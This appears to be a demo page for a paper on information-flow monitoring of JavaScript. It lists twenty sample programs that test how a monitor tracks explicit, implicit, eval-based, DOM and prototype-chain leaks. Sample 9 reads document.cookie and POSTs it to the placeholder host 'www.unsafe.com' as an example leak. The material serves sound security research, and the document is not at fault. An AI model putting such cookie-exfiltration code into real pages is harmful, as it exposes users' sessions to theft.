Instrumenting JavaScript with Information Flow Monitoring

Full Version of the Paper
Policies for External Interfaces

Input:




Output:




// Sample programs for the information-flow monitor demo. The page lists them
// back to back; each `var ...;` declaration below appears to start a new,
// independent program, so they are not meant to run as one script.
// upgVar, upgProp and upgStruct are not defined on this page. From the page
// title they presumably raise the security level of a variable, of one
// property, or of an object's structure to the given level ('2') -- TODO confirm
// against the paper.
// NOTE(review): the expected monitor verdict for each sample is not shown here.

// 1. Direct flow: y is computed from x after x is passed to upgVar.
var x, y;
x = 4;
upgVar(x, '2');
y = x + 4;

// 2. Control-dependent flow: x is written only inside a branch guarded by y,
//    and y was passed to upgVar.
var x, y;
y = 3;
upgVar(y, '2');
if (y) {
  x = 2;
}

// 3. Same shape as sample 2, but the write targets property z['p'], which is
//    passed to upgProp before the branch.
var x, y, z;
y = 3;
upgVar(y, '2');
z = {};
z['p'] = null;
upgProp(z, 'p', '2');
if (y) {
  z['p'] = 2;
}

// 4. As sample 3 without the upgProp call: z['p'] is left at its initial level
//    when the guarded write happens.
var x, y, z;
y = 3;
upgVar(y, '2');
z = {};
z['p'] = null;
if (y) {
  z['p'] = 2;
}

// 5. Dynamic code: the assignment to x exists only inside the string given to
//    eval, so it is not visible as ordinary source before evaluation.
var x;
eval('x = 3; x')

// 6. Dynamic code under a guarded branch: the eval'd string writes x and runs
//    only when y (passed to upgVar) is truthy.
var x, y;
x = 0;
y = 2;
upgVar(y, '2');
if (y) {
  eval('x = 3; x');
}

// 7. DOM API call under a guarded branch: text_node is created only when h is
//    truthy, then copied into l after the branch.
var text_node, h, l;
h = 1;
upgVar(h, '2');
if(h) {
  text_node = document['createTextNode']('macaco');
}
l = text_node;

// 8. A string passed to upgVar is handed to createTextNode and the resulting
//    node is appended to a new div. The variable name suggests an integrity
//    label rather than a confidentiality one -- TODO confirm.
var low_integrity_string, text_node, div;
low_integrity_string = 'xpto';
upgVar(low_integrity_string, '2');
text_node = document['createTextNode'](low_integrity_string);
div = document['createElement']('div');
div['appendChild'](text_node);

// 9. Cookie sent over the network: document['cookie'] is read into secret and
//    passed to xhr['send']. Both secret and the cookie property are upgraded
//    first; upgVar(secret, ...) runs before secret holds a value.
//    The URL has no scheme, so a browser resolves it relative to the current page.
var xhr, secret;
upgVar(secret, '2');
upgProp(document, 'cookie', '2');
xhr = new XMLHttpRequest();
xhr['open']('POST', 'www.unsafe.com/script1.php');
secret = document['cookie'];
xhr['send'](secret);

// 10. Deferred dynamic code: setTimeout receives a string, so the write to x is
//     evaluated later, outside the branch guarded by y that scheduled it.
var x, y;
x = 0;
y = 1;
upgVar(y, '2');
if(y) {
  setTimeout('x = 1', 1000);
}

// 11. Loop with computed property names and an output call on each iteration;
//     no upg* call appears in this sample.
var n, o;
n = 10;
o = {};
while(n) {
  o[n] = n;
  n = n - 1;
  alert(n);
}

// 12. Property name obtained through coercion: using o1 as a key calls its
//     toString, which returns 'p', so o2[o1] reads o2.p (the confirm() result).
//     NOTE(review): o1 and o2 are never assigned an object here, so as plain
//     JavaScript the first property write would throw.
var o1, o2, public1, secret, aux_f, public2;
secret = confirm('Do you have a secret?');
aux_f = function () {
  return 'p';
};
o1.toString = aux_f;
o2.p = secret;
public1 = o2[o1];
if(public1) {
  public2 = 3;
}

// 13. hasOwnProperty is replaced on the object by a function that always
//     returns false, before a guarded write to o['p'].
//     NOTE(review): o is never assigned and h is not declared in this sample.
var o, f_aux;
o['p'] = 0;
upgStruct (o, '2');
f_aux = function () {
  return false;
};
o['hasOwnProperty'] = f_aux;
if(h) {
  o['p'] = 1;
}

// 14. Constructor that upgrades its own 'id' property; the property is then
//     read directly into low.
var Person, p1, low;
Person = function(id, name, age) {
  var this_aux;
  this_aux = this;
  this_aux['id'] = id;
  this_aux['name'] = name;
  this_aux['age'] = age;
  upgProp(this_aux, 'id', '2');
}
p1 = new Person(1, 'Raquel', 22);
low = p1['id'];

// 15. As sample 14, but the upgraded property is read into high and low is
//     written only inside a branch guarded by high.
var Person, p1, high, low;
Person = function(id, name, age) {
  var this_aux;
  this_aux = this;
  this_aux['id'] = id;
  this_aux['name'] = name;
  this_aux['age'] = age;
  upgProp(this_aux, 'id', '2');
}
p1 = new Person(1, 'Raquel', 22);
high = p1['id'];
if(high) {
  low = high + 4;
}

// 16. Upgraded property on the prototype: 'someSecret' lives on
//     Person['prototype'] and is reached through p1 by prototype-chain lookup.
//     high and low are not in this sample's var list.
var Person, p1, aux_var_1;
Person = function(id, name, age) {
  var this_aux;
  this_aux = this;
  this_aux['id'] = id;
  this_aux['name'] = name;
  this_aux['age'] = age;
  upgProp(this_aux, 'id', '2');
}
aux_var_1 = Person['prototype'];
aux_var_1['someSecret'] = 'very secret string';
upgProp(aux_var_1, 'someSecret', '2');
p1 = new Person(1, 'Raquel', 22);
high = p1['someSecret'];
if (high) {
  low = high + 4;
}

// 17. Property creation under a guarded branch: whether o has a property 'p'
//     at all depends on h, and o itself is not upgraded.
var o, h;
o = {};
h = 3;
upgVar(h, '2');
if(h) {
  o['p'] = 2;
}

// 18. As sample 17, with upgStruct(o, '2') called before the guarded write.
var o, h;
o = {};
h = 3;
upgVar(h, '2');
upgStruct(o, '2');
if(h) {
  o['p'] = 2;
}

// 19. Method call returning an upgraded property: sayYourId, installed on the
//     prototype, returns this['id'], and the result is stored in high.
var o, h;
var Person, person_proto, function_aux, new_person, high;
Person = function(name, id) {
  var this_aux;
  this_aux = this;
  this_aux['name'] = name;
  this_aux['id'] = id;
  upgProp(this_aux, 'id', '2');
}
person_proto = Person['prototype'];
function_aux = function() {
  var aux_var_1;
  aux_var_1 = this;
  aux_var_1 = aux_var_1['id'];
  return aux_var_1;
}
person_proto['sayYourId'] = function_aux;
new_person = new Person('raquel', 1);
high = new_person['sayYourId']();

// 20. As sample 19, followed by a branch on the returned value that writes low
//     (low is not in this sample's var list).
var o, h;
var Person, person_proto, function_aux, new_person, high;
Person = function(name, id) {
  var this_aux;
  this_aux = this;
  this_aux['name'] = name;
  this_aux['id'] = id;
  upgProp(this_aux, 'id', '2');
}
person_proto = Person['prototype'];
function_aux = function() {
  var aux_var_1;
  aux_var_1 = this;
  aux_var_1 = aux_var_1['id'];
  return aux_var_1;
}
person_proto['sayYourId'] = function_aux;
new_person = new Person('raquel', 1);
high = new_person['sayYourId']();
if(high) {
  low = high * 2;
}